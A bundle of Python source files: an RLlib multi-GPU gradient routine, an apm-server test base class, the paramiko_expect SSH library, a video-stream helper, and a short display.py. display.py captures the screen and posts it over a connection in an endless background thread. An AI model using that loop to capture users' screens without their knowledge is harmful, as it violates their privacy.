if not isinstance(postprocessed_batch, SampleBatch):
postprocessed_batch = SampleBatch(postprocessed_batch)
postprocessed_batch.set_get_interceptor(
functools.partial(convert_to_torch_tensor, device=device or self.device)
)
return postprocessed_batch
def _multi_gpu_parallel_grad_calc(
self, sample_batches: List[SampleBatch]
) -> List[Tuple[List[TensorType], GradInfoDict]]:
"""Performs a parallelized loss and gradient calculation over the batch.
Splits up the given train batch into n shards (n=number of this
Policy's devices) and passes each data shard (in parallel) through
the loss function using the individual devices' models
(self.model_gpu_towers). Then returns each tower's outputs.
Args:
sample_batches: A list of SampleBatch shards to
calculate loss and gradients for.
Returns:
A list (one item per device) of 2-tuples, each with 1) gradient
list and 2) grad info dict.
"""
assert len(self.model_gpu_towers) == len(sample_batches)
lock = threading.Lock()
results = {}
grad_enabled = torch.is_grad_enabled()
def _worker(shard_idx, model, sample_batch, device):
torch.set_grad_enabled(grad_enabled)
try:
with NullContextManager() if device.type == "cpu" else torch.cuda.device( # noqa: E501
device
):
loss_out = force_list(
self._loss(self, model, self.dist_class, sample_batch)
)
# Call Model's custom-loss with Policy loss outputs and
# train_batch.
loss_out = model.custom_loss(loss_out, sample_batch)
assert len(loss_out) == len(self._optimizers)
# Loop through all optimizers.
grad_info = {"allreduce_latency": 0.0}
parameters = list(model.parameters())
all_grads = [None for _ in range(len(parameters))]
for opt_idx, opt in enumerate(self._optimizers):
# Erase gradients in all vars of the tower that this
# optimizer would affect.
param_indices = self.multi_gpu_param_groups[opt_idx]
for param_idx, param in enumerate(parameters):
if param_idx in param_indices and param.grad is not None:
param.grad.data.zero_()
# Recompute gradients of loss over all variables.
loss_out[opt_idx].backward(retain_graph=True)
grad_info.update(
self.extra_grad_process(opt, loss_out[opt_idx])
)
grads = []
# Note that return values are just references;
# Calling zero_grad would modify the values.
for param_idx, param in enumerate(parameters):
if param_idx in param_indices:
if param.grad is not None:
grads.append(param.grad)
all_grads[param_idx] = param.grad
if self.distributed_world_size:
start = time.time()
if torch.cuda.is_available():
# Sadly, allreduce_coalesced does not work with
# CUDA yet.
for g in grads:
torch.distributed.all_reduce(
g, op=torch.distributed.ReduceOp.SUM
)
else:
torch.distributed.all_reduce_coalesced(
grads, op=torch.distributed.ReduceOp.SUM
)
for param_group in opt.param_groups:
for p in param_group["params"]:
if p.grad is not None:
p.grad /= self.distributed_world_size
grad_info["allreduce_latency"] += time.time() - start
with lock:
results[shard_idx] = (all_grads, grad_info)
except Exception as e:
import traceback
with lock:
results[shard_idx] = (
ValueError(
e.args[0]
+ "\n traceback"
+ traceback.format_exc()
+ "\n"
+ "In tower {} on device {}".format(shard_idx, device)
),
e,
)
# Single device (GPU) or fake-GPU case (serialize for better
# debugging).
if len(self.devices) == 1 or self.config["_fake_gpus"]:
for shard_idx, (model, sample_batch, device) in enumerate(
zip(self.model_gpu_towers, sample_batches, self.devices)
):
_worker(shard_idx, model, sample_batch, device)
# Raise errors right away for better debugging.
last_result = results[len(results) - 1]
if isinstance(last_result[0], ValueError):
raise last_result[0] from last_result[1]
# Multi device (GPU) case: Parallelize via threads.
else:
threads = [
threading.Thread(
target=_worker, args=(shard_idx, model, sample_batch, device)
)
for shard_idx, (model, sample_batch, device) in enumerate(
zip(self.model_gpu_towers, sample_batches, self.devices)
)
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Gather all threads' outputs and return.
outputs = []
for shard_idx in range(len(sample_batches)):
output = results[shard_idx]
if isinstance(output[0], Exception):
raise output[0] from output[1]
outputs.append(results[shard_idx])
return outputs
@DeveloperAPI
class DirectStepOptimizer:
"""Typesafe method for indicating `apply_gradients` can directly step the
optimizers with in-place gradients.
"""
_instance = None
def __new__(cls):
if DirectStepOptimizer._instance is None:
DirectStepOptimizer._instance = super().__new__(cls)
return DirectStepOptimizer._instance
def __eq__(self, other):
return type(self) == type(other)
def __repr__(self):
return "DirectStepOptimizer"
_directStepOptimizerSingleton = DirectStepOptimizer()
|
apmserver.py
|
from datetime import datetime, timedelta
import json
import os
import re
import sets
import shutil
import sys
import threading
import time
import unittest
from urlparse import urlparse
from elasticsearch import Elasticsearch, NotFoundError
from nose.tools import nottest
import requests
sys.path.append(os.path.join(os.path.dirname(__file__), '..',
'..', '_beats', 'libbeat', 'tests', 'system'))
from beat.beat import INTEGRATION_TESTS, TestCase, TimeoutError
from helper import wait_until
from es_helper import cleanup, default_pipelines
from es_helper import index_smap, index_span, index_error, apm_prefix
integration_test = unittest.skipUnless(INTEGRATION_TESTS, "integration test")
diagnostic_interval = float(os.environ.get('DIAGNOSTIC_INTERVAL', 0))
class BaseTest(TestCase):
maxDiff = None
def setUp(self):
super(BaseTest, self).setUp()
# TODO: move to Mixin and use only in tests where self.es is available
self.setup_diagnostics()
def setup_diagnostics(self):
if diagnostic_interval <= 0:
return
self.addCleanup(self.cleanup_diagnostics)
self.diagnostics_path = os.path.join(self.working_dir, "diagnostics")
os.makedirs(self.diagnostics_path)
self.running = True
self.diagnostic_thread = threading.Thread(
target=self.dump_diagnotics, kwargs=dict(interval=diagnostic_interval))
self.diagnostic_thread.daemon = True
self.diagnostic_thread.start()
def cleanup_diagnostics(self):
self.running = False
self.diagnostic_thread.join(timeout=30)
def dump_diagnotics(self, interval=2):
while self.running:
# TODO: use threading.Timer instead to not block tearDown
time.sleep(interval)
with open(os.path.join(self.diagnostics_path,
datetime.now().strftime("%Y%m%d_%H%M%S") + ".hot_threads"), mode="w") as out:
try:
out.write(self.es.nodes.hot_threads(threads=99999))
except Exception as e:
out.write("failed to query hot threads: {}\n".format(e))
with open(os.path.join(self.diagnostics_path,
datetime.now().strftime("%Y%m%d_%H%M%S") + ".tasks"), mode="w") as out:
try:
json.dump(self.es.tasks.list(), out, indent=True, sort_keys=True)
except Exception as e:
out.write("failed to query tasks: {}\n".format(e))
@classmethod
def setUpClass(cls):
cls.beat_name = "apm-server"
cls.beat_path = os.path.abspath(os.path.join(
os.path.dirname(__file__), "..", ".."))
cls.build_path = cls._beat_path_join("build", "system-tests")
super(BaseTest, cls).setUpClass()
@classmethod
def _beat_path_join(cls, *paths):
return os.path.abspath(os.path.join(cls.beat_path, *paths))
@staticmethod
def get_elasticsearch_url(user="", password=""):
"""
Returns an elasticsearch.Elasticsearch instance built from the
env variables like the integration tests.
"""
host = os.getenv("ES_HOST", "localhost")
if not user:
user = os.getenv("ES_USER", "admin")
if not password:
password = os.getenv("ES_PASS", "changeme")
if user and password:
host = user + ":" + password + "@" + host
return "http://{host}:{port}".format(
host=host,
port=os.getenv("ES_PORT", "9200"),
)
@staticmethod
def get_kibana_url(user="", password=""):
"""
Returns kibana host URL
"""
host = os.getenv("KIBANA_HOST", "localhost")
if not user:
user = os.getenv("KIBANA_USER", "admin")
if not password:
password = os.getenv("KIBANA_PASS", "changeme")
if user and password:
host = user + ":" + password + "@" + host
return "http://{host}:{port}".format(
host=host,
port=os.getenv("KIBANA_PORT", "5601"),
)
def get_payload_path(self, name):
return self.get_testdata_path('intake-v2', name)
@nottest
def get_testdata_path(self, *names):
return self._beat_path_join('testdata', *names)
def get_payload(self, name):
with open(self.get_payload_path(name)) as f:
return f.read()
def get_error_payload_path(self):
return self.get_payload_path("errors_2.ndjson")
def get_transaction_payload_path(self):
return self.get_payload_path("transactions.ndjson")
def get_metricset_payload_payload_path(self):
return self.get_payload_path("metricsets.ndjson")
def get_event_payload(self, name="events.ndjson"):
return self.get_payload(name)
def ilm_index(self, index):
return "{}-000001".format(index)
class ServerBaseTest(BaseTest):
config_overrides = {}
host = "http://localhost:8200"
root_url = "{}/".format(host)
agent_config_url = "{}/{}".format(host, "config/v1/agents")
rum_agent_config_url = "{}/{}".format(host, "config/v1/rum/agents")
intake_url = "{}/{}".format(host, 'intake/v2/events')
rum_intake_url = "{}/{}".format(host, 'intake/v2/rum/events')
sourcemap_url = "{}/{}".format(host, 'assets/v1/sourcemaps')
expvar_url = "{}/{}".format(host, 'debug/vars')
jaeger_grpc_host = "localhost:14250"
jaeger_http_host = "localhost:14268"
jaeger_http_url = "http://{}/{}".format(jaeger_http_host, 'api/traces')
def config(self):
cfg = {"ssl_enabled": "false",
"queue_flush": 0,
"jaeger_grpc_enabled": "true",
"jaeger_grpc_host": self.jaeger_grpc_host,
"jaeger_http_enabled": "true",
"jaeger_http_host": self.jaeger_http_host,
"path": os.path.abspath(self.working_dir) + "/log/*"}
cfg.update(self.config_overrides)
return cfg
def setUp(self):
super(ServerBaseTest, self).setUp()
shutil.copy(self._beat_path_join("fields.yml"), self.working_dir)
# Copy ingest pipeline definition to home directory of the test.
# The pipeline definition is expected to be at a specific location
# relative to the home dir. This ensures that the file can be loaded
# for all installations (deb, tar, ..).
pipeline_dir = os.path.join("ingest", "pipeline")
pipeline_def = os.path.join(pipeline_dir, "definition.json")
target_dir = os.path.join(self.working_dir, pipeline_dir)
if not os.path.exists(target_dir):
os.makedirs(target_dir)
shutil.copy(self._beat_path_join(pipeline_def), target_dir)
self.render_config_template(**self.config())
self.start_proc()
self.wait_until_started()
def start_proc(self):
self.apmserver_proc = self.start_beat(**self.start_args())
self.addCleanup(self.stop_proc)
def stop_proc(self):
self.apmserver_proc.check_kill_and_wait()
def start_args(self):
return {}
def wait_until_started(self):
wait_until(lambda: self.log_contains("Starting apm-server"), name="apm-server started")
def assert_no_logged_warnings(self, suppress=None):
"""
Assert that the log file contains no ERR or WARN lines.
"""
if suppress == None:
suppress = []
# Jenkins runs as a Windows service and when Jenkins executes theses
# tests the Beat is confused since it thinks it is running as a service.
winErr = "ERR Error: The service process could not connect to the service controller."
corsWarn = "WARN\t.*CORS related setting .* Consider more restrictive setting for production use."
suppress = suppress + ["WARN EXPERIMENTAL", "WARN BETA", "WARN.*deprecated", winErr, corsWarn]
log = self.get_log()
for s in suppress:
log = re.sub(s, "", log)
self.assertNotRegexpMatches(log, "ERR|WARN")
def request_intake(self, data=None, url=None, headers=None):
if not url:
url = self.intake_url
if data is None:
data = self.get_event_payload()
if headers is None:
headers = {'content-type': 'application/x-ndjson'}
return requests.post(url, data=data, headers=headers)
class ElasticTest(ServerBaseTest):
skip_clean_pipelines = False
def config(self):
cfg = super(ElasticTest, self).config()
cfg.update({
"elasticsearch_host": self.get_elasticsearch_url(),
"file_enabled": "false",
"kibana_enabled": "false",
})
cfg.update(self.config_overrides)
return cfg
def setUp(self):
self.es = Elasticsearch([self.get_elasticsearch_url()])
self.kibana_url = self.get_kibana_url()
delete_pipelines = [] if self.skip_clean_pipelines else default_pipelines
cleanup(self.es, delete_pipelines=delete_pipelines)
super(ElasticTest, self).setUp()
# try make sure APM Server is fully up
self.wait_until_ilm_logged()
self.wait_until_pipeline_logged()
def wait_until_ilm_logged(self):
setup_enabled = self.config().get("ilm_setup_enabled")
msg = "Finished index management setup." if setup_enabled != "false" else "Manage ILM setup is disabled."
wait_until(lambda: self.log_contains(msg), name="ILM setup")
def wait_until_pipeline_logged(self):
registration_enabled = self.config().get("register_pipeline_enabled")
msg = "Registered Ingest Pipelines successfully" if registration_enabled != "false" else "No pipeline callback registered"
wait_until(lambda: self.log_contains(msg), name="pipelines registration")
def load_docs_with_template(self, data_path, url, endpoint, expected_events_count,
query_index=None, max_timeout=10, extra_headers=None):
if query_index is None:
query_index = apm_prefix
headers = {'content-type': 'application/x-ndjson'}
if extra_headers:
headers.update(extra_headers)
with open(data_path) as f:
r = requests.post(url, data=f, headers=headers)
assert r.status_code == 202, r.status_code
# Wait to give documents some time to be sent to the index
self.wait_for_events(endpoint, expected_events_count, index=query_index, max_timeout=max_timeout)
def wait_for_events(self, processor_name, expected_count, index=None, max_timeout=10):
"""
wait_for_events waits for an expected number of event docs with the given
'processor.name' value, and returns the hits when found.
"""
if index is None:
index = apm_prefix
query = {"term": {"processor.name": processor_name}}
result = {} # TODO(axw) use "nonlocal" when we migrate to Python 3
def get_docs():
hits = self.es.search(index=index, body={"query": query})['hits']
result['docs'] = hits['hits']
return hits['total']['value'] == expected_count
wait_until(get_docs,
max_timeout=max_timeout,
name="{} documents to reach {}".format(processor_name, expected_count),
)
return result['docs']
def check_backend_error_sourcemap(self, index, count=1):
rs = self.es.search(index=index, params={"rest_total_hits_as_int": "true"})
assert rs['hits']['total'] == count, "found {} documents, expected {}".format(
rs['hits']['total'], count)
for doc in rs['hits']['hits']:
err = doc["_source"]["error"]
for exception in err.get("exception", []):
self.check_for_no_smap(exception)
if "log" in err:
self.check_for_no_smap(err["log"])
def check_backend_span_sourcemap(self, count=1):
rs = self.es.search(index=index_span, params={"rest_total_hits_as_int": "true"})
assert rs['hits']['total'] == count, "found {} documents, expected {}".format(
rs['hits']['total'], count)
for doc in rs['hits']['hits']:
self.check_for_no_smap(doc["_source"]["span"])
def check_for_no_smap(self, doc):
if "stacktrace" not in doc:
return
for frame in doc["stacktrace"]:
assert "sourcemap" not in frame, frame
def logged_requests(self, url="/intake/v2/events"):
for line in self.get_log_lines():
jline = json.loads(line)
u = urlparse(jline.get("URL", ""))
if jline.get("logger") == "request" and u.path == url:
yield jline
def approve_docs(self, base_path, received):
"""
approve_docs compares the received documents to those contained
in the file at ${base_path}.approved.json. If that file does not
exist, then it is considered equivalent to a lack of documents.
Only the document _source is compared, and we ignore differences
in some context-sensitive fields such as the "observer", which
may vary between test runs.
"""
base_path = self._beat_path_join(os.path.dirname(__file__), base_path)
approved_path = base_path + '.approved.json'
received_path = base_path + '.received.json'
try:
with open(approved_path) as f:
approved = json.load(f)
except IOError:
approved = []
# get_doc_id returns a value suitable for sorting and identifying
# documents: either a unique ID, or a timestamp. This is necessary
# since not all event types require a unique ID (namely, errors do
# not.)
#
# We return (0, doc['error']['id']) when the event type is 'error'
# if that field exists, otherwise returns (1, doc['@timestamp']).
# The first tuple element exists to sort IDs before timestamps.
def get_doc_id(doc):
doc_type = doc['processor']['event']
if 'id' in doc[doc_type]:
return (0, doc[doc_type]['id'])
return (1, doc['@timestamp'])
received = [doc['_source'] for doc in received]
received.sort(key=get_doc_id)
try:
for rec in received:
# Overwrite received observer values with the approved ones,
# in order to avoid noise in the 'approvals' diff if there are
# any other changes.
#
# We don't compare the observer values between received/approved,
# as they are dependent on the environment.
rec_id = get_doc_id(rec)
rec_observer = rec['observer']
self.assertEqual(sets.Set(rec_observer.keys()), sets.Set(
["hostname", "version", "id", "ephemeral_id", "type", "version_major"]))
assert rec_observer["version"].startswith(str(rec_observer["version_major"]) + ".")
for appr in approved:
if get_doc_id(appr) == rec_id:
rec['observer'] = appr['observer']
# ensure both docs have the same event keys set
self.assertEqual(rec.get("event", {}).keys(), appr.get("event", {}).keys())
# We don't compare the event values between received/approved
# as they are dependent on the environment.
if 'event' in rec:
rec['event'] = appr['event']
break
assert len(received) == len(approved)
for i, rec in enumerate(received):
appr = approved[i]
rec_id = get_doc_id(rec)
assert rec_id == get_doc_id(appr), "New entry with id {}".format(rec_id)
for k, v in rec.items():
self.assertEqual(v, appr[k])
except Exception as exc:
with open(received_path, 'w') as f:
json.dump(received, f, indent=4, separators=(',', ': '))
# Create a dynamic Exception subclass so we can fake its name to look like the original exception.
class ApprovalException(Exception):
def __init__(self, cause):
super(ApprovalException, self).__init__(cause.message)
def __str__(self):
return self.message + "\n\nReceived data differs from approved data. Run 'make update' and then 'approvals' to verify the diff."
ApprovalException.__name__ = type(exc).__name__
raise ApprovalException, exc, sys.exc_info()[2]
class ClientSideBaseTest(ServerBaseTest):
sourcemap_url = 'http://localhost:8200/assets/v1/sourcemaps'
intake_url = 'http://localhost:8200/intake/v2/rum/events'
backend_intake_url = 'http://localhost:8200/intake/v2/events'
config_overrides = {}
def config(self):
cfg = super(ClientSideBaseTest, self).config()
cfg.update({"enable_rum": "true",
"kibana_enabled": "false",
"smap_cache_expiration": "200"})
cfg.update(self.config_overrides)
return cfg
def get_backend_error_payload_path(self, name="errors_2.ndjson"):
return super(ClientSideBaseTest, self).get_payload_path(name)
def get_backend_transaction_payload_path(self, name="transactions_spans.ndjson"):
return super(ClientSideBaseTest, self).get_payload_path(name)
def get_error_payload_path(self, name="errors_rum.ndjson"):
return super(ClientSideBaseTest, self).get_payload_path(name)
def get_transaction_payload_path(self, name="transactions_spans_rum_2.ndjson"):
return super(ClientSideBaseTest, self).get_payload_path(name)
def upload_sourcemap(self, file_name='bundle_no_mapping.js.map',
service_name='apm-agent-js',
service_version='1.0.1',
bundle_filepath='bundle_no_mapping.js.map'):
path = self._beat_path_join('testdata', 'sourcemap', file_name)
with open(path) as f:
return requests.post(self.sourcemap_url,
files={'sourcemap': f},
data={'service_version': service_version,
'bundle_filepath': bundle_filepath,
'service_name': service_name})
class ClientSideElasticTest(ClientSideBaseTest, ElasticTest):
def wait_for_sourcemaps(self, expected_ct=1):
self.wait_for_events('sourcemap', expected_ct, index=index_smap)
def check_rum_error_sourcemap(self, updated, expected_err=None, count=1):
rs = self.es.search(index=index_error, params={"rest_total_hits_as_int": "true"})
assert rs['hits']['total'] == count, "found {} documents, expected {}".format(
rs['hits']['total'], count)
for doc in rs['hits']['hits']:
err = doc["_source"]["error"]
for exception in err.get("exception", []):
self.check_smap(exception, updated, expected_err)
if "log" in err:
self.check_smap(err["log"], updated, expected_err)
def check_rum_transaction_sourcemap(self, updated, expected_err=None, count=1):
rs = self.es.search(index=index_span, params={"rest_total_hits_as_int": "true"})
assert rs['hits']['total'] == count, "found {} documents, expected {}".format(
rs['hits']['total'], count)
for doc in rs['hits']['hits']:
span = doc["_source"]["span"]
self.check_smap(span, updated, expected_err)
@staticmethod
def check_smap(doc, updated, err=None):
if "stacktrace" not in doc:
return
for frame in doc["stacktrace"]:
smap = frame["sourcemap"]
if err is None:
assert 'error' not in smap
else:
assert err in smap["error"]
assert smap["updated"] == updated
class CorsBaseTest(ClientSideBaseTest):
def config(self):
cfg = super(CorsBaseTest, self).config()
cfg.update({"allow_origins": ["http://www.elastic.co"]})
return cfg
class ExpvarBaseTest(ServerBaseTest):
config_overrides = {}
def config(self):
cfg = super(ExpvarBaseTest, self).config()
cfg.update(self.config_overrides)
return cfg
def get_debug_vars(self):
return requests.get(self.expvar_url)
class SubCommandTest(ServerBaseTest):
config_overrides = {}
def config(self):
cfg = super(SubCommandTest, self).config()
cfg.update({
"elasticsearch_host": self.get_elasticsearch_url(),
"file_enabled": "false",
})
cfg.update(self.config_overrides)
return cfg
def wait_until_started(self):
self.apmserver_proc.check_wait()
# command and go test output is combined in log, pull out the command output
log = self.get_log()
pos = -1
for _ in range(2):
# export always uses \n, not os.linesep
pos = log[:pos].rfind("\n")
self.command_output = log[:pos]
for trimmed in log[pos:].strip().splitlines():
# ensure only skipping expected lines
assert trimmed.split(None, 1)[0] in ("PASS", "coverage:"), trimmed
def stop_proc(self):
return
class ProcStartupFailureTest(ServerBaseTest):
def stop_proc(self):
try:
self.apmserver_proc.kill_and_wait()
except:
self.apmserver_proc.wait()
def wait_until_started(self):
return
|
paramiko_expect.py
|
#
# Paramiko Expect
#
# Written by Fotis Gimian
# http://github.com/fgimian
#
# This library works with a Paramiko SSH channel to provide native SSH
# expect-like handling for servers. The library may be used to interact
# with commands like 'configure' or Cisco IOS devices or with interactive
# Unix scripts or commands.
#
# You must have Paramiko installed in order to use this library.
#
from __future__ import unicode_literals
import codecs
import sys
import re
import socket
import struct
import time
# Windows does not have termios
try:
import termios
import tty
has_termios = True
MAX_TIMEOUT = 2 ** (struct.Struct(str('i')).size * 8 - 1) - 1
except ImportError: # pragma: no cover
import threading
has_termios = False
MAX_TIMEOUT = threading.TIMEOUT_MAX
import select
def strip_ansi_codes(s):
return re.sub(r'\x1b\[([0-9,A-Z]{1,2}(;[0-9]{1,2})?(;[0-9]{3})?)?[m|K]?', '', s)
def default_output_func(msg):
sys.stdout.write(msg)
sys.stdout.flush()
class SSHClientInteraction(object):
"""
This class allows an expect-like interface to Paramiko which allows
coders to interact with applications and the shell of the connected
device.
:param client: A Paramiko SSHClient object
:param timeout: The connection timeout in seconds
:param newline: The newline character to send after each command
:param buffer_size: The amount of data (in bytes) that will be read at
a time after a command is run
:param display: Whether or not the output should be displayed in
real-time as it is being performed (especially useful
when debugging)
:param encoding: The character encoding to use.
:param lines_to_check: The number of last few lines of the output to
look at, while matching regular expression(s)
"""
def __init__(
self, client, timeout=60, newline='\r', buffer_size=1024,
display=False, encoding='utf-8', output_callback=default_output_func,
tty_width=80, tty_height=24, lines_to_check=1
):
self.channel = client.invoke_shell(width=tty_width, height=tty_height)
self.timeout = timeout
self.newline = newline
self.buffer_size = buffer_size
self.display = display
self.encoding = encoding
self.output_callback = output_callback
self.lines_to_check = lines_to_check
self.current_output = ''
self.current_output_clean = ''
self.current_send_string = ''
self.last_match = ''
# If the output is long, multi-byte encoded characters may be split
# across calls to recv, so decode incrementally.
self.decoder = codecs.getincrementaldecoder(self.encoding)()
def __del__(self):
self.close()
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def close(self):
"""Attempts to close the channel for clean completion."""
try:
self.channel.close()
except Exception:
pass
def expect(
self, re_strings='', timeout=None, output_callback=None, default_match_prefix='.*\n',
strip_ansi=True, ignore_decode_error=True, lines_to_check=None, leave_expected=False
):
"""
This function takes in a regular expression (or regular expressions)
that represent the last line of output from the server. The function
waits for one or more of the terms to be matched. The regexes are
matched using expression \n<regex>$ so you'll need to provide an
easygoing regex such as '.*server.*' if you wish to have a fuzzy
match.
:param re_strings: Either a regex string or list of regex strings
that we should expect; if this is not specified,
then EOF is expected (i.e. the shell is completely
closed after the exit command is issued)
:param timeout: Timeout in seconds. If this timeout is exceeded,
then an exception is raised.
:param output_callback: A function used to print ssh output. Printed to stdout
by default. A user-defined logger may be passed like
output_callback=lambda m: mylog.debug(m)
:param default_match_prefix: A prefix to all match regexes, defaults to '.*\n',
can set to '' on cases prompt is the first line,
or the command has no output.
:param strip_ansi: If True, will strip ansi control chars befores regex matching
default to True.
:param ignore_decode_error: If True, will ignore decode errors if any.
default to True.
:param lines_to_check: The number of last few lines of the output to
look at, while matching regular expression(s)
:return: An EOF returns -1, a regex metch returns 0 and a match in a
list of regexes returns the index of the matched string in
the list.
:raises: A socket.timeout exception is raised on timeout.
"""
output_callback = output_callback if output_callback else self.output_callback
# Set the channel timeout
timeout = timeout if timeout else self.timeout
self.channel.settimeout(timeout)
lines_to_check = lines_to_check if lines_to_check else self.lines_to_check
if ignore_decode_error:
self.decoder = codecs.getincrementaldecoder(self.encoding)('ignore')
# Create an empty output buffer
self.current_output = ''
# saves the current buffer to check for re_strings pattern
current_buffer_output_decoded = ''
# This function needs all regular expressions to be in the form of a
# list, so if the user provided a string, let's convert it to a 1
# item list.
if isinstance(re_strings, str) and len(re_strings) != 0:
re_strings = [re_strings]
# to avoid looping in recv_ready()
base_time = time.time()
# Loop until one of the expressions is matched or loop forever if
# nothing is expected (usually used for exit)
while (
len(re_strings) == 0 or
not [re_string
for re_string in re_strings
if re.match(default_match_prefix + re_string + '$',
current_buffer_output_decoded, re.DOTALL)]
):
current_buffer_output_decoded = ''
# avoids paramiko hang when recv is not ready yet
while not self.channel.recv_ready():
time.sleep(.009)
if time.time() >= (base_time + timeout):
print('EXCESS TIME RECV_READY TIMEOUT, did you expect() before a send()')
return -1
# Read some of the output
current_buffer = self.channel.recv(self.buffer_size)
# If we have an empty buffer, then the SSH session has been closed
if len(current_buffer) == 0:
break
# Convert the buffer to our chosen encoding
current_buffer_decoded = self.decoder.decode(current_buffer)
# Strip all ugly \r (Ctrl-M making) characters from the current
# read
current_buffer_decoded = current_buffer_decoded.replace('\r', '')
# Display the current buffer in realtime if requested to do so
# (good for debugging purposes)
if strip_ansi:
current_buffer_decoded = strip_ansi_codes(current_buffer_decoded)
if not current_buffer_decoded:
continue
if self.display:
output_callback(current_buffer_decoded)
# Add the currently read buffer to the output
self.current_output += current_buffer_decoded
current_buffer_output_decoded = '\n' + '\n'.join(self.current_output.splitlines()[-lines_to_check:])
# Grab the first pattern that was matched
if len(re_strings) != 0:
found_pattern = [(re_index, re_string)
for re_index, re_string in enumerate(re_strings)
if re.match(default_match_prefix + re_string + '$',
self.current_output, re.DOTALL)]
# Clean the output up by removing the sent command
self.current_output_clean = self.current_output
if len(self.current_send_string) != 0:
self.current_output_clean = (
self.current_output_clean.replace(
self.current_send_string + self.newline, ''
)
)
# Reset the current send string to ensure that multiple expect calls
# don't result in bad output cleaning
self.current_send_string = ''
# Clean the output up by removing the expect output from the end if
# requested and save the details of the matched pattern
if len(re_strings) != 0 and len(found_pattern) != 0:
if not leave_expected:
self.current_output_clean = (
re.sub(
found_pattern[0][1] + '$', '', self.current_output_clean
)
)
self.last_match = found_pattern[0][1]
return found_pattern[0][0]
else:
# We would socket timeout before getting here, but for good
# measure, let's send back a -1
return -1
def send(self, send_string, newline=None):
"""Saves and sends the send string provided."""
self.current_send_string = send_string
# send_string, _ = codecs.getdecoder(self.encoding)(send_string)
newline = newline if newline is not None else self.newline
# don't send till send_ready
while not self.channel.send_ready():
time.sleep(.009)
self.channel.send(send_string)
self.channel.send(newline)
def tail(
self, line_prefix=None, callback=None, output_callback=None, stop_callback=lambda x: False,
timeout=None
):
"""
This function takes control of an SSH channel and displays line
by line of output as \n is recieved. This function is specifically
made for tail-like commands.
:param line_prefix: Text to append to the left of each line of output.
This is especially useful if you are using my
MultiSSH class to run tail commands over multiple
servers.
:param callback: You may optionally supply a callback function which
takes two paramaters. The first is the line prefix
and the second is current line of output. The
callback should return the string that is to be
displayed (including the \n character). This allows
users to grep the output or manipulate it as
required.
:param output_callback: A function used to print ssh output. Printed to stdout
by default. A user-defined logger may be passed like
output_callback=lambda m: mylog.debug(m)
:param stop_callback: A function usesd to stop the tail, when function retruns
True tail will stop, by default stop_callback=lambda x: False
:param timeout: how much time to wait for data, default to None which
mean almost forever.
"""
output_callback = output_callback if output_callback else self.output_callback
# Set the channel timeout to the maximum allowed value,
# setting this to None breaks the KeyboardInterrupt exception and
# won't allow us to Ctrl+C out of the script
timeout = timeout if timeout else MAX_TIMEOUT
self.channel.settimeout(timeout)
# Create an empty line buffer and a line counter
current_line = b''
line_counter = 0
line_feed_byte = '\n'.encode(self.encoding)
# Loop forever, Ctrl+C (KeyboardInterrupt) is used to break the tail
while True:
# Read the output one byte at a time so we can detect \n correctly
buffer = self.channel.recv(1)
# If we have an empty buffer, then the SSH session has been closed
if len(buffer) == 0:
break
# Add the currently read buffer to the current line output
current_line += buffer
# Display the last read line in realtime when we reach a \n
# character
if buffer == line_feed_byte:
current_line_decoded = self.decoder.decode(current_line)
if line_counter:
if callback:
output_callback(callback(line_prefix, current_line_decoded))
else:
if line_prefix:
output_callback(line_prefix)
output_callback(current_line_decoded)
if stop_callback(current_line_decoded):
break
line_counter += 1
current_line = b''
def take_control(self):
"""
This function is a better documented and touched up version of the
posix_shell function found in the interactive.py demo script that
ships with Paramiko.
"""
if has_termios:
# Get attributes of the shell you were in before going to the
# new one
original_tty = termios.tcgetattr(sys.stdin)
try:
tty.setraw(sys.stdin.fileno())
tty.setcbreak(sys.stdin.fileno())
# We must set the timeout to 0 so that we can bypass times when
# there is no available text to receive
self.channel.settimeout(0)
# Loop forever until the user exits (i.e. read buffer is empty)
while True:
select_read, select_write, select_exception = (
select.select([self.channel, sys.stdin], [], [])
)
# Read any output from the terminal and print it to the
# screen. With timeout set to 0, we just can ignore times
# when there's nothing to receive.
if self.channel in select_read:
try:
buffer = self.channel.recv(self.buffer_size)
if len(buffer) == 0:
break
sys.stdout.write(self.decoder.decode(buffer))
sys.stdout.flush()
except socket.timeout:
pass
# Send any keyboard input to the terminal one byte at a
# time
if sys.stdin in select_read:
buffer = sys.stdin.read(1)
if len(buffer) == 0:
break
self.channel.send(buffer)
finally:
# Restore the attributes of the shell you were in
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, original_tty)
else:
def writeall(sock):
while True:
buffer = sock.recv(self.buffer_size)
if len(buffer) == 0:
break
sys.stdout.write(self.decoder.decode(buffer))
sys.stdout.flush()
writer = threading.Thread(target=writeall, args=(self.channel,))
writer.start()
try:
while True:
buffer = sys.stdin.read(1)
if len(buffer) == 0:
break
self.channel.send(buffer)
# User has hit Ctrl+Z or F6
except EOFError:
pass
|
display.py
|
import threading
try:
from .grab import Image
except:pass
def grab_bytes():
return Image().asbytes
def send(s,a):
s.post(b's'+grab_bytes(),a)
def show_bytes(r):
if not r.startswith('s'):return
Image(r[1:]).show()
def conf(s,a):
def _conf():
while True:
send(s,a)
threading.Thread(target=_conf).start()
|
video_base.py
|
import time
import threading
try:
from greenlet import getcurrent as get_ident
except ImportError:
try:
from thread import get_ident
except ImportError:
from _thread import get_ident
'''
An Event-like class that signals all active clients when a new frame is available.
'''
class VideoEvent(object):
# Initialize events variable
def __init__(self):
self.events = {}
def wait(self):
'''Invoked from each client's thread to wait for the next frame.'''
ident = get_ident()
if ident not in self.events:
# this is a new client
# add an entry for it in the self.events dict
# each entry has two elements, a threading.Event() and a timestamp
self.events[ident] = [threading.Event(), time.time()]
return self.events[ident][0].wait()
def set(self):
'''Invoked by the camera thread when a new frame is available.'''
now = time.time()
remove = None
for ident, event in self.events.items():
if not event[0].isSet():
# if this client's event is not set, then set it
# also update the last set timestamp to now
event[0].set()
event[1] = now
else:
# if the client's event is already set, it means the client
# did not process a previous frame
# if the event stays set for more than 5 seconds, then assume
# the client is gone and remove it
if now - event[1] > 5:
remove = ident
if remove:
del self.events[remove]
def clear(self):
'''Invoked from each client's thread after a frame was processed.'''
self.events[get_ident()][0].clear()
'''
An Base class that signals all active clients when a new frame is available.
'''
class VideoBase(object):
thread = None # background thread that reads frames from video stream
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
event = VideoEvent()
video_source = 0 # video stream source: camera or video file
def __init__(self, video_source):
VideoBase.video_source = video_source
